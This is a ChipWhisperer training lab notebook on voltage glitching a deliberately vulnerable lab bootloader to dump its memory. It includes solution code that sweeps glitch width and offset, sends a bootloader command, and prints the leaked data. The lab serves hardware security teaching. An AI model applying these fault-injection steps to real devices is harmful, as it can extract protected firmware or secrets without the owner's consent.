# Part 2, Topic 2: Voltage Glitching to Dump Memory (MAIN)

---
NOTE: This lab references some (commercial) training material on [ChipWhisperer.io](https://www.ChipWhisperer.io). You can freely execute and use the lab per the open-source license (including using it in your own courses if you distribute similarly), but you must maintain notice about this source location. Consider joining our training course to enjoy the full experience.

---

**SUMMARY:** *In the previous lab, we learned how voltage glitching can be used for a similar function as clock glitching. We also learned about how it has fewer limitations, but can be less reliable for certain target setups. It also changes a great deal based on the properties of the glitch circuit itself - even changing a wire can have a huge effect.*

*In this lab, we'll use what we learned in the last lab to again attack the vulnerable serial printing of the bootloader*

**LEARNING OUTCOMES:**

* Applying previous glitch settings to new firmware
* Checking for success and failure when glitching
* Understanding how compiler optimizations can cause devices to behave in strange ways

## The Situation

You should already know the situation from your previous attempts at glitching this bootloader (as well as what the flaw is). No need to do big long searches for parameters to try glitching at the beginning of the loop, just use values that worked well for the previous tutorial.

Be careful that you don't accidentally put the spot we're trying to glitch outside of `glitch_spots` - if you used a repeat > 1, the actual spot being glitched might be at the end or in the middle of the repeat!

In [ ]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'CWLITEXMEGA'

In [ ]:
%%bash -s "$PLATFORM"
cd ../../../hardware/victims/firmware/bootloader-glitch
make PLATFORM=$1 CRYPTO_TARGET=NONE

In [ ]:
%run "../../Helper_Scripts/Setup_Generic.ipynb"

In [ ]:
fw_path = "../../../hardware/victims/firmware/bootloader-glitch/bootloader-{}.hex".format(PLATFORM)

In [ ]:
cw.program_target(scope, prog, fw_path)

In [ ]:
#Basic setup
# ###################
# Add your code here
# ###################
#raise NotImplementedError("Add your code here, and delete this.")

# ###################
# START SOLUTION
# ###################
if PLATFORM == "CWLITEXMEGA":
    scope.clock.clkgen_freq = 32E6
    target.baud = 38400*32/7.37
    def reboot_flush():            
        scope.io.pdic = False
        time.sleep(0.05)
        scope.io.pdic = "high_z"
        time.sleep(0.05)
        #Flush garbage too
        target.flush()
else:
    def reboot_flush():            
        scope.io.nrst = False
        time.sleep(0.05)
        scope.io.nrst = True
        time.sleep(0.05)
        #Flush garbage too
        target.flush()
        
glitch_spots = []
glitch_spots.extend([i for i in range(9600, 9650, 1)])
#Basic setup
scope.glitch.clk_src = "clkgen" # set glitch input clock
scope.glitch.output = "glitch_only" # glitch_out = clk ^ glitch
scope.glitch.trigger_src = "ext_single" # glitch only after scope.arm() called

scope.io.glitch_hp = True
scope.io.glitch_lp = True
print(scope.glitch)
def my_print(text):
    for ch in text:
        if (ord(ch) > 31 and ord(ch) < 127) or ch == "\n": 
            print(ch, end='')
        else:
            print("0x{:02X}".format(ord(ch)), end='')
        print("", end='')
        
scope.adc.timeout = 0.1
# ###################
# END SOLUTION
# ###################

In [ ]:
# GlitchController will be part of ChipWhisperer core - just run this block
# for now.


import matplotlib.pylab as plt
  
import chipwhisperer.common.results.glitch as glitch
      
gc = glitch.GlitchController(groups=["success", "reset", "normal"], parameters=["width", "offset"])
gc.display_stats()


In [ ]:
from importlib import reload
import chipwhisperer.common.results.glitch as glitch
from tqdm.notebook import tqdm
import re
import struct
#Basic setup
# ###################
# Add your code here
# ###################
#raise NotImplementedError("Add your code here, and delete this.")

# ###################
# START SOLUTION
# ###################

scope.glitch.width_fine = 0
scope.glitch.offset_fine = 0
#gc.set_range("width", 47.2, 47.8)
gc.set_range("width", 45.7, 47.8)
#gc.set_range("width", 27, 29.8)
#gc.set_range("width", -18, -19.6)

div = 1
#gc.set_range("offset", -46.5/div, -44.8/div)
gc.set_range("offset", 2/div, 9/div)

#scope.glitch.repeat = 5
scope.glitch.repeat=10
div = 1
gc.set_global_step([0.4])

plt.plot(gc.parameter_min[0], gc.parameter_min[1], ' ')
plt.plot(gc.parameter_min[0], gc.parameter_max[1], ' ')
plt.plot(gc.parameter_max[0], gc.parameter_min[1], ' ')
plt.plot(gc.parameter_max[0], gc.parameter_max[1], ' ')
    
for glitch_setting in gc.glitch_values():
    scope.glitch.offset = glitch_setting[1]
    scope.glitch.width = glitch_setting[0]
    for i in tqdm(glitch_spots, leave=False):
        for _ in range(10):
            scope.glitch.ext_offset = i
            if scope.adc.state:
                #print("Timeout, trigger still high!")
                gc.add("reset", (scope.glitch.width, scope.glitch.offset))
                #plt.plot(scope.glitch.width, scope.glitch.ext_offset, 'xr', alpha=1)
                #fig.canvas.draw()

                #Device is slow to boot?
                reboot_flush()
            target.flush()
            scope.arm()
            target.write("p516261276720736265747267206762206f686c207a76797821\n")
            ret = scope.capture()
            if ret:
                #print('Timeout - no trigger')
                gc.add("reset", (scope.glitch.width, scope.glitch.offset))
                #plt.plot(scope.glitch.width, scope.glitch.ext_offset, 'xr', alpha=1)
                #fig.canvas.draw()

                #Device is slow to boot?
                reboot_flush()
            else:
                time.sleep(0.05)
                output = target.read(timeout=2)
                if "767" in output:
                    print("Glitched!\n\tExt offset: {}\n\tOffset: {}\n\tWidth: {}".format(i, scope.glitch.offset, scope.glitch.width))
                    #plt.plot(scope.glitch.width, scope.glitch.ext_offset, '+g')
                    gc.add("success", (scope.glitch.width, scope.glitch.offset))
                    #fig.canvas.draw()
                    broken = True 
                    for __ in range(500):
                        num_char = target.in_waiting()
                        if num_char:
                            my_print(output)
                            output = target.read(timeout=50)
                    time.sleep(1)
                    break
                else:
                    gc.add("normal", (scope.glitch.width, scope.glitch.offset))
                    #plt.plot(scope.glitch.width, scope.glitch.ext_offset, '.k', alpha=0.1)
                    #fig.canvas.draw()
# ###################
# END SOLUTION
# ###################

In [ ]:
scope.dis()
target.dis()